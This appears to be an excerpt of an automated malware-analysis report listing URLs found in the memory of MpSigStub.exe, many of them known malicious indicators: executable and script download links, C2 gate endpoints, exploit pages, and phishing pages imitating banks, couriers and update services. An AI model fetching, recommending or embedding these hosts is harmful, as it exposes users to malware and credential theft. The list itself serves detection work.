Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://gpt.alarmasystems.ru/wp-content/upgrade/obi.html
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://granitmdp.com/rechnung-nr-06197/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://greenertrack.info/.well-known/acme-challenge/hp.gf
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://greenthdykegheedahatakankeadeshnaathfgh.ydns.eu/office360/regasm.exe
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://greentreee.com/src/gate.php?a
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: http://gridinsoft.com/check_ver.php?product=chmeditor&ver=
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://grizzli-counter.com/id120/index.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.bluechipstaffing.com/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.chromaimagen.com/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.couturefloor.com/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.ddoborguild.com/0n1ine.exe
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.dondyablo.com/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.echowin.com/autorizz0.exe
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.globaltcms.com/autorizz0.exe
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.hamiltoncustomhomesinc.com/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.securitiessupportunit.com/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.securityguardlisting.com/setup.exe
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://gveejlsffxmfjlswjmfm.com/files/
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://gx3bxpo.sed.digitalmusictutorials.com
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://gyeuiojndhbvmaoiwnnchauwo28vnj8mjmvnwhk.ydns.eu/document.doc
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://h1m2en.ddns.net/sa98as8f7/kk/1445785485
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://hackbox.f3322.org:808/Consys21.dll
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://handjobheats.com/xgi-bin/q.php
Source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp	String found in binary or memory: http://hao.360.cn
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://hao.360.cn/?src=lm&
Source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp	String found in binary or memory: http://hao.360.cnx
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: http://happy-fxs.com/sms/
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://harpa.space/kgodu.dot
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://hasvideo.net?t=
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: http://hellos.tcp4.me/standard-bank-online-relief-funds-ucount-onlinebanking.standardbank.co.za-dire
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://helpefy.com/002/777/new%20outlook/new%20outlook/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://helpservice09.hol.es
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://hem1.passagen.se/fylke/
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://hgastation.com
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://hi.ru/?44
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://highnmightytv.com/orderss182doc.php
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://highnmightytv.com/wp-content/themes/data.php
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://highpay.website/css/windows.jar
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://hikangaroo5.com/images/xjs7s/gb40f_eygecpdogfzeca1xtg/ruryf1?sxps=vddxqzhm_&oof=xptbdzfnuzvdt
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://hiltrox.com
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://hiodus.bounceme.net/nations/history.html/f
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://hit1.marinalvapn.com/silage.zip
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://ho.io/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://hollywoodnailspa.net/auth/tb/tb/index.html)
Source: MpSigStub.exe, 00000026.00000003.18351149084.00000138BD6B0000.00000004.00000001.sdmp	String found in binary or memory: http://hombresvalientesposadas.com/zek/reportdhlnew2.php
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://home.zh-cn.cc/
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://hookbase.com/Index.htm
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://host87.net
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://hostserver.kr
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://hostthenpost.org/uploads/
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://hotbar.com
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://hotedeals.co.uk/ekck095032/
Source: MpSigStub.exe, 00000026.00000003.18306680829.00000138BD4FA000.00000004.00000001.sdmp	String found in binary or memory: http://houusha33.icu/jquery/jquery.php
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://hqdating.net
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	String found in binary or memory: http://hqsextube08.com/getsoft/task.php?v=
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://html.hjsm.tom.com/?mod=book&act=anonsearch&key=%s
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://htmlcss.3322.org/sub/ray.js
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://httpswindowsupdates.com/apkssl230459.exe
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://httpz.ru
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://hyoeyeep.ws/template.doc
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://hytechmart.com
Source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp	String found in binary or memory: http://i.compucrush.com/i.php
Source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	String found in binary or memory: http://i.compucrush.com/i.phpxD
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://i.imgur.com/
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: http://i.omeljs.info/omel/javascript.js?appTitle=PennyBee&channel=chkomel
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://i.sfu.edu.ph/ds/161120.gif
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://i.ttd7.cn/getsoft
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	String found in binary or memory: http://iaa.1eko.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://ianlunn.co.uk
Source: MpSigStub.exe, 00000026.00000003.18352509630.00000138BD16D000.00000004.00000001.sdmp	String found in binary or memory: http://ibm.dmcast.com/t.rar
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://icanhazip.com
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://icloudstorage.moonfruit.com/?preview=y
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://idc.9e3.com/web/hao123/hack.swfwidth=0height=0
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: http://idea-secure-login.com/3/ddg.dll5
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	String found in binary or memory: http://idmnfs.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://ie.search.psn.cn/
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://iefeadsl.com/feat/
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: http://iframe.ip138.com/ic.asp
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://ilya-popov.ru/wp-content/uploads/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://image.soso.com/image.cgi?w=%s
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://images-saver.pw/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://images.google.cn/images?q=%s
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://imd.gdyiping.com
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://img-save.xyz
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://img.zhongsou.com/i?w=%s
Source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp	String found in binary or memory: http://imp.fusioninstall.com/impression.do/?event=installer_start&referrer=x
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	String found in binary or memory: http://imp.mymapsxp.com/
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://imp.theweathercenter.co/
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://impex.maaraj.com/images/total_visitas.php
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://incredicole.com/wp-content/themes/elegant-grunge/images/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://indonesiacyberteam.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://inent17alexe.rr
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://infolokercpns.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://inform.3utilities.com/lib64/index.html/f
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://ingridzinnel.com/invoices-attached/
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	String found in binary or memory: http://init.crash-analysis.com
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	String found in binary or memory: http://init.icloud-analysis.com
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	String found in binary or memory: http://init.icloud-diagnostics.com
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://injectsorals.com/
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://inline477.info/fsrv
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://ins.pricejs.net/dealdo/install-report
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://ins.pricejs.net/dealdo/install-report?type=install
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://ins.quickinstallpack.com/?action=
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://ins.rdxrp.com/stats/
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://insf.quickinstallpack.com/?action=
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://insightout-me.com/backup/excellview.php
Source: MpSigStub.exe, 00000026.00000003.18332668729.00000138BD2B0000.00000004.00000001.sdmp	String found in binary or memory: http://install.outbrowse.com/logTrack.php?x
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://install.xxxtoolbar.com/download_straight.html
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://install.xxxtoolbar.com/ist/scripts/prompt.php?
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://installdream.com/download/blankNet2.dat
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://installer.mediapassplugin.com/
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://installmp3codec.info/
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://installs.hotbar.com/installs/hotbar/programs/
Source: MpSigStub.exe, 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	String found in binary or memory: http://instamailserver.link/finito.ps1
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://instituitartetculture.com/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://instituthypnos.com/maps1316/ki_d/
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://int.dpool.sina.com.cn/iplookup/iplookup.php
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://integrityshavenequinerescuecentre.ca/css/oswald-webfont/test.exe
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://interface.kokmobi.com/newservice
Source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp	String found in binary or memory: http://interstat.eux
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://investmenteducationkungykmtsdy8agender.duckdns.org/office/
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://iopsctlvzs.com/riu-hmgzhkjut/ymxggj-wnk_wpiohjhik/koptwt/xtz--r-gou--h_wktgzno-.php?
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://ios-certificate-update.com
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://ios-update-whatsapp.com
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com/
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com/json/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://ip-score.com/checkip/
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://ip.158166.com/zcb2009/ie7-0day.htmwidth=0height=0
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://ip.aq138.com/setip.asp
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://ippp.co.zw/ds/161120.gif
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://iranvision1404.com/ss/info/redebit_transactions/terms/kohc-xuxo_lcxty-av6e
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://ismailiyamedical.com/ds/151120.gif
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://istanbulyilbasimekanlari.com/tracking-number-
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: http://istart.webssearches.com/?type=sc
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://isvbr.net
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://iy6h86i.sed.tiresnwheels4fun.com
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://iz.orda.icu/webiz.php
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://j.pricejs.net/
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://jL.chura.pl/rc/
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://jaculus.ru/902b3449e3e8/interbase/counteract/neat/luxurious/relate/jjibwjhi.dot
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://jaklaw.co/wp-includes/js/plupload/db/view/
Source: MpSigStub.exe, 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://japanesecosplaygirl.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://jaqvicmy.ru/count7.php
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: http://java-se.com/o.js
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://java.sun.com/products/autodl/j2se
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://javafx.com
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://javascriptobfuscator.com
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://jay6.tech/wp-content/themes/twentynineteen/template-parts/cont
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://jjjjjkl.pe.hu/doc
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://jmmgroup.ae/213.doc
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: http://jmmgroup.ae/coo.exe
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://jobylive2.w22.haohaohost.cn/c/abbx/qqpost.asp
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: http://joelosteel.gdn/eml/put.php
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://johnnyslandscaping.org/over.php
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://joxi.ru/
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://jquerystatistics.org/update.js
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: http://jqueryui.com
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://js.k0102.com/ad
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: http://js.mykings.pw:280/v.sctscrobj.dll
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://jugnitv.com/final.jpg
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://juiillosks.sytes.net/
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://jump.qq.com/clienturl_100?clientuin=
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://jump.qq.com/clienturl_15
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://juntec.es/rechnung-18561/
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://justgaytgp.net/rd/out.php
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://jxmienphi.net/update/
Source: MpSigStub.exe, 00000026.00000003.18325799879.00000138BCB89000.00000004.00000001.sdmp	String found in binary or memory: http://jxvh.com/goto.php
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://jyhjyy.top
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://kapper.st/info.txt
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: http://karab.hopto.org/sarg.dot
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://karadyma.com/dhlpack/kfqakff/)
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://karafetdoll.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://kavok.ind.br/ds/2312.gif
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://kec-rupit.muratarakab.go.id/si/excelz/index.php?email=
Source: MpSigStub.exe, 00000026.00000003.18301813906.00000138BCBCB000.00000004.00000001.sdmp	String found in binary or memory: http://keeppure.cn/tool/xxz.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://kemra.co.ke/bbaoh/
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://keramikadecor.com.ua/bdfg/excelzz/index.php
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	String found in binary or memory: http://keratomir.biz/get.php?partner=
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://khaleejposts.com/rgk/m_rs/
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://king.connectioncdn.
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://king.lionsheart.square7.ch/99.exe
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://king.lionsheart.square7.ch/wrk.exe
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://kishi73.com.br/
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://kit.mastacash.com/
Source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp	String found in binary or memory: http://kle.austries
Source: MpSigStub.exe, 00000026.00000003.18322662955.00000138BD62C000.00000004.00000001.sdmp	String found in binary or memory: http://kokovs.cc/porno/stat.php
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://kollinsoy.skyefenton.com:8080/xml.js
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://kolo.crionn.com/kolo.php
